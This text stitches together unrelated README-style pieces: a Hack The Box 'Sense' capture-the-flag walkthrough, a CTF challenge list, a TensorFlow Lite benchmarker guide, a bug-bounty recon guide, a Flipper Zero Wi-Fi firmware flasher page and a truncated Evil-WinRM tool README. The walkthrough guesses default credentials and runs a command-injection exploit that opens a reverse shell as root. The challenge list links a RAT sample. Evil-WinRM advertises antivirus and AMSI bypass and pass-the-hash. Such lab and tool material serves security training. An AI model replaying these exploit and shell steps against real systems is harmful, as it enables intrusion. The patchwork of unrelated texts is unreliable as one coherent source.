[@devanshbatham](https://github.com/devanshbatham) [@defparam](https://github.com/defparam/) [@bp0lr](https://github.com/bp0lr/) [@ameenmaali](https://github.com/ameenmaali) [@dwisiswant0](https://github.com/dwisiswant0) [@1ndianl33t](https://github.com/1ndianl33t) [@Emoe](https://github.com/Emoe/) [@sqlmapproject](https://github.com/sqlmapproject/sqlmap) **Warning:** This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution
# Sense: 10.10.10.60 ## Hints - Admin access is all about directory enumeration and default creds - Code execution is all about software version - Privesc may not be required! ## nmap Starting with the usual `nmap` scan. Interesting ports: ```none 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/https? ``` ## 80 + 443: Recon + Gobuster Browsing to the website - we get redirected to port 443 (HTTPS) and the pfSense login page is displayed - a free network firewall distribution. Interesting. ![pfSense login page](screenshots/443_home.png) Tried a couple default logins, such as: - `admin:admin` - `admin:sense` - `admin:pfsense` The last one was a lucky guess off the top of my head... and after a quick Google, the official docs on the [Default Username and Password](https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html) is `admin:pfsense`. Regardless, none of the credentials were valid. I have a friend who has a pfsense setup - and knew it has an inbuilt defense against password guessing. So I stopped password guessing and avoided the use of `hydra` - which would usually be a good option here. The next step, try `gobuster` - with quite a few extensions and a small wordlist. The extensions were a bit of a gut instinct. I knew pfSense is written in PHP. The other extensions were selected after having a little look through the project GitHub repos. ```none └─$ gobuster dir -t 20 -u https://10.10.10.60 -w ~/SecLists/Discovery/Web-Content/common.txt -o gobuster_443_root_common.log -k -x php,txt,sh,xml ``` Success! Found an interesting file called `changelog.txt`. ```none # Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window ``` This seemed like a non-vendor style changelog - so seems like a good hint. It seemed like the best thing would be to find an exploit to try - based on the hint in the `changelog.txt` file. But without a version number, it is like flying blind - and the only information I had was the machine release date. Looking at the previous `gobuster` results I decided to extend the search with some other wordlists. Tried a couple, then got lucky. ```none └─$ gobuster dir -t 20 -u https://10.10.10.60 -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster_443_root_medium.log -k -x php,txt,sh ``` Got another interesting file named `system-users.txt`. ```none ####Support ticket### Please create the following user username: Rohit password: company defaults ``` The `company defaults` threw me for a second, and then realised it probably referred to the vendor defaults. Tried the following credentials, and got access: - Username: `rohit` - Password: `pfsense` ![pfSense admin panel](screenshots/443_admin_panel.png) With access to the admin panel, we can see the software version information: ```none 2.1.3-RELEASE (amd64) built on Thu May 01 15:52:13 EDT 2014 FreeBSD 8.3-RELEASE-p16 ``` ## Getting Code Execution With access to the admin panel and the exact version number of the pfSense software - time to go looking for code execution to get a shell. Looking for `pfsense` in `searchsploit` got a lot of results. ```none └─$ searchsploit pfsense ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------- --------------------------------- pfSense - 'interfaces.php?if' Cross-Site Scripting | hardware/remote/35071.txt pfSense - 'pkg.php?xml' Cross-Site Scripting | hardware/remote/35069.txt pfSense - 'pkg_edit.php?id' Cross-Site Scripting | hardware/remote/35068.txt pfSense - 'status_graph.php?if' Cross-Site Scripting | hardware/remote/35070.txt pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | unix/remote/43193.rb pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities | php/remote/34985.txt pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Comman | php/webapps/23901.txt pfSense 2.1 build 20130911-1816 - Directory Traversal | php/webapps/31263.txt pfSense 2.2 - Multiple Vulnerabilities | php/webapps/36506.txt pfSense 2.2.5 - Directory Traversal | php/webapps/39038.txt pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/41501.txt Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit) | php/remote/43341.rb pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting | php/webapps/46538.txt pfSense 2.4.4-p1 - Cross-Site Scripting | multiple/webapps/46316.txt pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting | php/webapps/46936.txt pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting | freebsd/webapps/48300.txt pfSense 2.4.4-p3 - Cross-Site Request Forgery | php/webapps/48714.txt pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | php/webapps/39709.txt pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery | php/webapps/39306.html pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery | php/webapps/39695.txt pfSense UTM Platform 2.0.1 - Cross-Site Scripting | freebsd/webapps/24439.txt ``` Took the usual "Hack The Box Exploit Finding Approach" - ignoring exploits that were not useful, such as XSS, and other client-side exploits. Since there wasn't an exact match, tried doing some more research on this specific version of pfsense. I checked the [Releases](https://docs.netgate.com/pfsense/en/latest/releases/index.html) page on Netgate (who make pfsense) to try get more information. The security fixes for each release were not easy to navigate or disseminate. Then I started digging through some of the results provided by `searchsploit` and trying some of the exploits - mainly code execution exploits. Spent about 30-40 minutes messing around with no luck. I went "down" the list from the top, so it took a while to get to _pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection_. In retrospect, after trying this exploit and it working I was thinking of my methodology. After getting command injection I Googled the software version - and the first hit was what I needed?! Hindsight! ![pfSense exploit](screenshots/443_pfsense_exploit.png) I copied the exploit using `searchsploit`: ```none └─$ searchsploit -m php/webapps/43560.py Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection URL: https://www.exploit-db.com/exploits/43560 Path: /usr/share/exploitdb/exploits/php/webapps/43560.py File Type: Python script, ASCII text executable, with CRLF line terminators Copied to: /media/sf_share/m/sense/43560.py ``` This exploit was easy to work with. No self-signed SSL errors, and written in Python 3. Nice to use, and the exploit seemed to work out the box. Something I don't get much with Python exploits in ExploitDB. The only problem I had was not starting a reverse shell listener on my machine, which made the exploit fail silently (or without a good error). This is because the default payload is a Python reverse shell. The full syntax I used was: ```none └─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.2 --lport 9001 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed ``` And... command execution and a reverse shell as `root`. It was pretty easy once I got the right exploit! ```none └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.60] 19994 sh: can't access tty; job control turned off # id uid=0(root) gid=0(wheel) groups=0(wheel) # wc -c /home/rohit/user.txt 32 /home/rohit/user.txt # wc -c /root/root.txt 33 /root/root.txt ``` Done! ## Lessons Learned - Remember to try different wordlists logically (e.g., small with lots of extensions to large with a few/no extensions) - Stop relying on the go-to tools, like `searchsploit` in this case, to find exploits ## Useful Resources - [HackTheBox Sense - ippsec](https://www.youtube.com/watch?v=d2nVDoVr0jE) - [HTB: Sense by 0xdf](https://0xdf.gitlab.io/2021/03/11/htb-sense.html)
# hackthebox-c1-encryptbd-2018 ![HTB Image](https://raw.githubusercontent.com/rudSarkar/hackthebox-c1-encryptbd-2018/master/htb.jpeg) HackTheBox C1 by EnctyptBD ## Challenge 1: Richard Tolar is working in a organization as a Vice President of Accounting. A recent data breach leaks this information. Find out the source (website) of data breach. **Hints: OSINT, Text Storage Site** ## Challenge 2: Download the image from [here](https://raw.githubusercontent.com/rudSarkar/hackthebox-c1-encryptbd-2018/master/Challenge-2/thumb.rar) **(pwd: 123)**. Analyze it and find the two hidden messages. **Hints: Cryptography, Stenography** ## Challenge 3: Download the malware from [here](https://raw.githubusercontent.com/rudSarkar/hackthebox-c1-encryptbd-2018/master/Challenge-3/system.rar) **(pwd: 123)**. Analyze it (dynamic or static), find out its category, identify the C&C server, exploitation methodology and other activities. Hints: RAT, Windows ## Challenge 4: Go to this website [here](http://104.129.171.125/). Find out and exploit the two web application vulnerabilities that are exists on this website. Hints: Wordpress, OWASP Top10 ## Challenge 5: There is a mistake in this php code. Re-code it with a the solution. ```PHP <?php ... if ($_SESSION['admin_loggedin'] !== true) { header('Location: /log-in.php'); } ... ?> ``` Hints: Script Execution
# OVIC Benchmarker for NIPS 2018 This folder contains the SDK for track one of the [Low Power ImageNet Recognition Challenge workshop at NIPS 2018.](https://lpirc.ecn.purdue.edu/) ## Pre-requisite Follow the steps [here](https://www.tensorflow.org/lite/demo_android) to install Tensorflow, Bazel, and the Android NDK and SDK. ## Test the benchmarker: The testing utilities helps the developers (you) to make sure that your submissions in TfLite format will be processed as expected in the competition's benchmarking system. Note: for now the tests only provides correctness checks, i.e. classifier predicts the correct category on the test image, but no on-device latency measurements. To test the latency measurement functionality, the tests will print the latency running on a desktop computer, which is not indicative of the on-device run-time. We are releasing an benchmarker Apk that would allow developers to measure latency on their own devices. ### Obtain the sample models The test data (models and images) should be downloaded automatically for you by Bazel. In case they are not, you can manually install them as below. Note: all commands should be called from your tensorflow installation folder (under this folder you should find `tensorflow/lite`). * Download the [testdata package](https://storage.googleapis.com/download.tensorflow.org/data/ovic_2018_10_23.zip): ```sh curl -L https://storage.googleapis.com/download.tensorflow.org/data/ovic_2018_10_23.zip -o /tmp/ovic.zip ``` * Unzip the package into the testdata folder: ```sh unzip -j /tmp/ovic.zip -d tensorflow/lite/java/ovic/src/testdata/ ``` ### Run tests You can run test with Bazel as below. This helps to ensure that the installation is correct. ```sh bazel test --cxxopt=--std=c++11 //tensorflow/lite/java/ovic:OvicClassifierTest --cxxopt=-Wno-all --test_output=all bazel test --cxxopt=--std=c++11 //tensorflow/lite/java/ovic:OvicDetectorTest --cxxopt=-Wno-all --test_output=all ``` ### Test your submissions Once you have a submission that follows the instructions from the [competition site](https://gdoc.pub/doc/e/2PACX-1vSFTEMAE_N6RgtidT-4DVTje6f6HRJv7Q_zaCab5H66BFyqEiZ8PsUfD_-YmBE7_z67qDiNgk-CJqeE), you can verify it in two ways: #### Validate using randomly generated images You can call the validator binary below to verify that your model fits the format requirements. This often helps you to catch size mismatches (e.g. output for classification should be [1, 1001] instead of [1,1,1,1001]). Let say the submission file is located at `/path/to/my_model.lite`, then call: ```sh bazel build --cxxopt=--std=c++11 //tensorflow/lite/java/ovic:ovic_validator --cxxopt=-Wno-all bazel-bin/tensorflow/lite/java/ovic/ovic_validator /path/to/my_model.lite classify ``` Successful validation should print the following message to terminal: ``` Successfully validated /path/to/my_model.lite. ``` To validate detection models, use the same command but provide "detect" as the second argument instead of "classify". #### Test that the model produces sensible outcomes You can go a step further to verify that the model produces results as expected. This helps you catch bugs during TOCO conversion (e.g. using the wrong mean and std values). * Move your submission to the testdata folder: ```sh cp /path/to/my_model.lite tensorflow/lite/java/ovic/src/testdata/ ``` * Resize the test image to the resolutions that are expected by your submission: The test images can be found at `tensorflow/lite/java/ovic/src/testdata/test_image_*.jpg`. You may reuse these images if your image resolutions are 128x128 or 224x224. * Add your model and test image to the BUILD rule at `tensorflow/lite/java/ovic/src/testdata/BUILD`: ```JSON filegroup( name = "ovic_testdata", srcs = [ "@tflite_ovic_testdata//:detect.lite", "@tflite_ovic_testdata//:float_model.lite", "@tflite_ovic_testdata//:low_res_model.lite", "@tflite_ovic_testdata//:quantized_model.lite", "@tflite_ovic_testdata//:test_image_128.jpg", "@tflite_ovic_testdata//:test_image_224.jpg" "my_model.lite", # <--- Your submission. "my_test_image.jpg", # <--- Your test image. ], ... ``` * Modify `OvicClassifierTest.java` and `OvicDetectorTest.java` to test your model. Change `TEST_IMAGE_PATH` to `my_test_image.jpg`. Change either `FLOAT_MODEL_PATH` or `QUANTIZED_MODEL_PATH` to `my_model.lite` depending on whether your model runs inference in float or [8-bit](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/quantize). Now you can run the bazel tests to catch any runtime issues with the submission. Note: Please make sure that your submission passes the test. If a submission fails to pass the test it will not be processed by the submission server. ## Measure on-device latency We provide two ways to measure the on-device latency of your submission. The first is through our competition server, which is reliable and repeatable, but is limited to a few trials per day. The second is through the benchmarker Apk, which requires a device and may not be as accurate as the server, but has a fast turn-around and no access limitations. We recommend that the participants use the benchmarker apk for early development, and reserve the competition server for evaluating promising submissions. ### Running the benchmarker app Make sure that you have followed instructions in [Test your submissions](#test-your-submissions) to add your model to the testdata folder and to the corresponding build rules. Modify `tensorflow/lite/java/ovic/demo/app/OvicBenchmarkerActivity.java`: * Add your model to the benchmarker apk by changing `MODEL_PATH` and `TEST_IMAGE_PATH` below to your submission and test image. ``` private static final String TEST_IMAGE_PATH = "my_test_image.jpg"; private static final String MODEL_PATH = "my_model.lite"; ``` * Adjust the benchmark parameters when needed: You can chnage the length of each experiment, and the processor affinity below. `BIG_CORE_MASK` is an integer whose binary encoding represents the set of used cores. This number is phone-specific. For example, Pixel 2 has 8 cores: the 4 little cores are represented by the 4 less significant bits, and the 4 big cores by the 4 more significant bits. Therefore a mask value of 16, or in binary `00010000`, represents using only the first big core. The mask 32, or in binary `00100000` uses the second big core and should deliver identical results as the mask 16 because the big cores are interchangeable. ``` /** Wall time for each benchmarking experiment. */ private static final double WALL_TIME = 3000; /** Maximum number of iterations in each benchmarking experiment. */ private static final int MAX_ITERATIONS = 100; /** Mask for binding to a single big core. Pixel 1 (4), Pixel 2 (16). */ private static final int BIG_CORE_MASK = 16; ``` Note: You'll need ROOT access to the phone to change processor affinity. * Build and install the app. ``` bazel build -c opt --cxxopt=--std=c++11 --cxxopt=-Wno-all //tensorflow/lite/java/ovic/demo/app:ovic_benchmarker_binary adb install -r bazel-bin/tensorflow/lite/java/ovic/demo/app/ovic_benchmarker_binary.apk ``` Start the app and pick a task by clicking either the `CLF` button for classification or the `DET` button for detection. The button should turn bright green, signaling that the experiment is running. The benchmarking results will be displayed after about the `WALL_TIME` you specified above. For example: ``` my_model.lite: Average latency=158.6ms after 20 runs. ``` ### Sample latencies Note: the benchmarking results can be quite different depending on the background processes running on the phone. A few things that help stabilize the app's readings are placing the phone on a cooling plate, restarting the phone, and shutting down internet access. | Classification Model | Pixel 1 latency (ms) | Pixel 2 latency (ms) | | -------------------- |:---------------------:| --------------------:| | float_model.lite | 120 | 155 | | quantized_model.lite | 85 | 74 | | low_res_model.lite | 4.2 | 4.0 | | Detection Model | Pixel 2 latency (ms) | | -------------------- |:---------------------:| | detect.lite | 331 | | quantized_detect.lite| 95 | Since Pixel 2 has excellent support for 8-bit quantized models, we strongly recommend you to check out the [quantization training tutorial](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/quantize). The detection models above are both single-shot models (i.e. no object proposal generation) using TfLite's *fast* version of Non-Max-Suppression (NMS). The fast NMS is significant faster than the regular NMS (used by the ObjectDetectionAPI in training) at the expense of about 1% mAP for the listed models.
# Recon_and_bugbounty_methodology recon from my perspective and combining different methodlogies of security reasearchers such as jason haddix , nahamsec and more ### Access playlist here : <a href="https://www.youtube.com/watch?v=W8XT_KIzxBA&list=PLf3J-S0CLK3VSusI8Gn4f4ZKS16UIn720">Recon Playlist </a> ### POCs playlist : <a href="https://www.youtube.com/playlist?list=PLf3J-S0CLK3WBYAILJWkjk5-PHjUinwyv">Proof of concepts playlist</a> ### New playlists: <a href="https://youtu.be/zO06tfmnhZg">AWS pentesting playlist</a> Increasing the target region: ## 1 find subdomains of target from different tools || google dorks ### google dorks: site: *.hackerone.com site: *.*.hackerone.com ### sublis3r sublist3r -d domain-name ### dnsrecon : dnsrecon -d hackerone.com -D ~/wordlists/subdomains.txt -t brt ### subfinder <a href="https://github.com/projectdiscovery/subfinder"> subfinder</a> ### 2 Recon from google dorks see this amazing tool Bigbounty recon <a href="https://github.com/Viralmaniar/BigBountyRecon">BIGBOUNTY RECON</A> ### 3 How to organise work for bug bounty software for organizing the work: xmind <a href="https://github.com/anurag708989/recon_methodology/blob/main/jasonHaddix_PentestingTemplate.xmind">JASON HADIX TEMPLATE</a> ### 4 directry fuzzing or content finding (ffuz), httprobe , byp4xx usefull wordlist if needed (wordlist are already in kali linux seclists but if you need more then checkout):<a href="https://github.com/anurag708989/SecLists"> USEFUL WORDLIST </a> <a href="https://github.com/tomnomnom/httprobe">HTTPROBE</a> ``` git clone https://github.com/tomnomnom/httprobe ``` <a href="https://github.com/ffuf/ffuf">FFUZ</a> ``` git clone https://github.com/ffuf/ffuf ``` most used ffuz command : ``` ffuf -p 0.1 -t 1 -w ~/wordlists/content.txt -u https://www.website.com ``` ffuz command vary for different request such as requests containing parameters and cookies so from my opinion just brute force directries and use burp suit for another stuff but if you don't know to use burp then see the documentation from above link and hack!!!. ### <a href="https://youtu.be/Kya7bSGnJjY">Github Recon</a> Resources and References ### 5 Github Dorks https://securitytrails.com/blog/github-dorks GitROB https://michenriksen.com/blog/gitrob-now-in-go/ News https://nakedsecurity.sophos.com/2019/03/25/thousands-of-coders- are-leaving-their-crown-jewels-exposed-on-github/ Github Bug Bounty Hunting https://gist.github.com/EdOverflow/922549f610b258f459b219a32f 92d10b Assetnote https://blog.assetnote.io/bug-bounty/2019/04/23/getting-access- zendesk-gcp/ ### 6 Automated github recon using GitDorker #### see original repo here : <a href="https://github.com/obheda12/GitDorker">GitDorker</a> #### see tutorial here : <a href="https://youtu.be/zgpDx41LsL4">youtube_automated_github_recon_tutorial</a> #### google output sheet ably : <a href="https://docs.google.com/spreadsheets/d/12wDg1ma56622LooraVT7BV9-GFEKs5G0wIzIzTuScig/edit?usp=sharing">reconSheetAbly</a> ### Steps: 1 clone the repository ``` git clone https://github.com/obheda12/GitDorker.git ``` 2. move to GitDorker diretry ``` cd GitDorker ``` 3. installation steps ``` pip3 install -r requirements.txt ``` 4. use this command for more options ``` python3 GitDorker.py -h ``` 5. generate personal access token githubAccount > settings > developer settings > personal access tokens 6. copy the tokens to a file say github_token_for_gitdoreker.txt 7. just run command ``` python3 GitDorker.py -q <give primary query here - say tesla.com> -tf github_token_for_gitdorker.txt -d dorks_file.txt -o output.csv ``` ### 7 Automated S3 bucket recon using lazys3 and s3scanner #### lazys3 (<a href="https://github.com/nahamsec/lazys3">Nahamsec s3</a>) ##### Details: A Ruby script to bruteforce for AWS s3 buckets using different permutations. usage ``` ruby lazys3.rb <company> ``` ### 8 Getting Starting with AWS pentesting | s3 buckets full youtube video: https://youtu.be/zO06tfmnhZg chrome extension (uDomainFlag) : https://chrome.google.com/webstore/detail/udomainflag/eklbfdpploakpkdakoielobggbhemlnm?hl=en #### using nuclei: you can use technologies template to detect s3 for example using subfinder 1. ``` subfinder -d target.com | httprobe -prefer-https | tee subdomain_1.txt ``` now use it in nuclei 2. ``` nuclei -l subdomain_1.txt -t path-to-template -o output-file.txt ``` #### using host command ``` host target.com ``` s3 vulnerability: bucket listing ---> all public access ``` aws s3 ls s3://flaws.cloud --region us-west-2 --no-sign-request ``` ---> access to aws users only aws should be configured command to set configuration: ``` aws configure ``` ``` aws s3 ls s3://flaws.cloud --region us-west-2 ``` tools for s3 crawl/enum : https://github.com/mxm0z/awesome-sec-s3 Bucket flaws: https://github.com/nikhil1232/Bucket-Flaws
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) on the Wifi Devboard! Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) (WIP for Windows too including full automated downloads.) Looking for a quick video walkthrough on how to use this flasher? [Thanks to Lab401.com, you're in luck](https://www.youtube.com/watch?v=um_acrDaBK4)!<br> Or if you'd rather have a quick rundown of using the Flipper Application, check out [this summary from haxez.org](https://haxez.org/2022/11/marauding-wi-fi-networks-with-the-flipper-zero/). ![Flasher_SS](https://user-images.githubusercontent.com/57457139/195889709-cd8086f2-dbd3-4ca2-9965-75be64fab4da.png) ## Now it's as easy as 1, 2, 3 to install or update Marauder on Windows. 1. Download and extract [the ZIP file](https://github.com/UberGuidoZ/Flipper/raw/main/Wifi_DevBoard/FZ_Marauder_Flasher/FZ_Marauder_v2.1.zip) above to the same directory.<br> 2. Hold `BOOT` on the devboard and plug it into your PC directly via USB.<br> 3. Double-click `flash.bat` from the extracted files then choose `Flash` or `Update`. * If you choose `Flash Marauder` the script will locate your board and flash Marauder automatically!<br> * If you choose `Update Marauder` you'll be taken to the Marauder download location to grab a new version.<br> (Simply download the Flipper BIN file, stick it in the Marauder subfolder by the batch file, and delete the old BIN.)<br> * If you choose `Save Flipper Blackmagic WiFi settings` your current Blackmagic configuration will be saved.<br> * If you choose `Flash Flipper Blackmagic` the script will flash the original Blackmagic firmware it shipped with. Current Marauder version included in the ZIP: v0.10.2.20230315 (current release as of Mar 15, 2023) **Once the install has completed, [head over here](https://github.com/UberGuidoZ/Flipper/tree/main/Wifi_DevBoard#marauder-install-information) to learn more about what Marauder can do!** The [batch file](https://github.com/UberGuidoZ/Flipper/blob/main/Wifi_DevBoard/FZ_Marauder_Flasher/Flash-v1.9.bat) is also included above for review and to track coming changes. Acknowledgements:<br> * [justcallmekoko](https://github.com/justcallmekoko/ESP32Marauder) for the AWESOME work in developing Marauder and porting it to the Flipper. * [0xchocolate](https://github.com/0xchocolate) for the Marauder companion plugin (now in [Unleashed](https://github.com/Eng1n33r/flipperzero-firmware) and [RogueMaster](https://github.com/RogueMaster/flipperzero-firmware-wPlugins).) * [Frog](https://github.com/FroggMaster) For initial scripting under the [Wifi Pentest Tool](https://github.com/FroggMaster/ESP32-Wi-Fi-Penetration-Tool) and inspiring the idea.<br> * [ImprovingRigmarole](https://github.com/Improving-Rigmarole) Initial (and continued) scripting of this flasher and lots of testing.<br> * [UberGuidoZ](https://github.com/UberGuidoZ) Tweaking/Automating Frog's original, continued scripting, development, and testing. ----- ## Donation Information Nothing is ever expected for the hoarding of digital files, creations I have made, or the people I may have helped. ## Ordering from Lab401? [USE THIS LINK FOR 5% OFF!](https://lab401.com/r?id=vsmgoc) (Or code `UberGuidoZ` at checkout.) I've had so many asking for me to add this.<br> ![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg) **BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`<br> **BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`<br> **ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`<br> **LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`<br> **PayPal**: `[email protected]` So, here it is. All donations of *any* size are humbly appreciated.<br> ![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg) Donations will be used for hardware (and maybe caffeine) to further testing!<br> ![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)
# Evil-WinRM [![Version-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/evil-winrm.rb) [![Ruby2.3-shield]](https://www.ruby-lang.org/en/news/2015/12/25/ruby-2-3-0-released/) [![Gem-Version]](https://rubygems.org/gems/evil-winrm) [![License-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE) [![Docker-shield]](https://hub.docker.com/r/oscarakaelvis/evil-winrm) The ultimate WinRM shell for hacking/pentesting ![Banner](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/resources/evil-winrm_logo.png) ## Description & Purpose This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators. This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff. It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines. ## Features - Compatible to Linux and Windows client systems - Load in memory Powershell scripts - Load in memory dll files bypassing some AVs - Load in memory C# (C Sharp) assemblies bypassing some AVs - Load x64 payloads generated with awesome [donut] technique - Dynamic AMSI Bypass to avoid AV signatures - Pass-the-hash support - Kerberos auth support - SSL and certificates support - Upload and download files showing progress bar - List remote machine services without privileges - Command History - WinRM command completion - Local files/directories completion - Remote path (files/directories) completion (can be disabled optionally) - Colorization on prompt and output messages (can be disabled optionally) - Optional logging feature - Docker support (prebuilt images available at [Dockerhub]) - Trap capturing to avoid accidental shell exit on Ctrl+C ## Help ``` Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l] -S, --ssl Enable ssl -c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate -k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate -r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } -s, --scripts PS_SCRIPTS_PATH Powershell scripts local path --spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP) -e, --executables EXES_PATH C# executables local path -i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required) -U, --url URL Remote url endpoint (default /wsman) -u, --user USER Username (required if not using kerberos) -p, --password PASS Password -H, --hash HASH NTHash -P, --port PORT Remote host port (default 5985) -V, --version Show version -n, --no-colors Disable colors -N, --no-rpath-completion Disable remote path completion -l, --log Log the WinRM session -h, --help Display this help message ``` ## Requirements Ruby 2.3 or higher is needed. Some ruby gems are needed as well: `winrm >=2.3.2`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`. Depending of your installation method (4 availables) the installation of them could be required to be done manually. Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication. For some Linux like Debian based (Kali, Parrot, etc.) it is called `krb5-user`. For BlackArch it is called `krb5` and probably it could be called in a different way for other Linux distributions. The remote path completion feature will work only if your ruby was compiled enabling the `--with-readline-dir` flag. This is enabled by default in ruby included on some Linux distributions but not in all. Check [the section below](#Remote-path-completion) for more info. ## Installation & Quick Start (4 methods) ### Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system) - Step 1. Install it (it will install automatically dependencies): ```gem install evil-winrm``` - Step 2. Ready. Just launch it! ``` evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' ``` ### Method 2. Git clone and install dependencies on your system manually - Step 1. Install dependencies manually: `sudo gem install winrm winrm-fs stringio logger fileutils` - Step 2. Clone the repo: `git clone https://github.com/Hackplayers/evil-winrm.git` - Step 3. Ready. Just launch it! ``` cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' ``` ### Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm) - Step 1. Install bundler: `gem install bundler` - Step 2. Clone the repo: `git clone https://github.com/Hackplayers/evil-winrm.git` - Step 3. Install dependencies with bundler: `cd evil-winrm && bundle install --path vendor/bundle` - Step 4. Launch it with bundler: ``` bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' ``` ### Method 4. Using Docker - Step 1. Launch docker container based on already built image: ``` docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/' ``` ## Documentation ### Clear text password If you don't want to put the password in clear text, you can optionally avoid to set `-p` argument and the password will be prompted preventing to be shown. ### Ipv6 To use IPv6, the address must be added to /etc/hosts. Just put the already set name of the host after `-i` argument instead of an IP address. ### Basic commands - **upload**: local files can be auto-completed using tab key. - usage: `upload local_filename` or `upload local_filename destination_filename` - **download**: - usage: `download remote_filename` or `download remote_filename destination_filename` __Notes about paths (upload/download)__: Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at `/data` and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S. - **services**: list all services showing if there your account has permissions over each one. No administrator permissions needed to use this feature. - **menu**: load the `Invoke-Binary`, `Dll-Loader` and `Donut-Loader` functions that we will explain below. When a ps1 is loaded all its functions will be shown up. ``` *Evil-WinRM* PS C:\> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' ( ' (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | 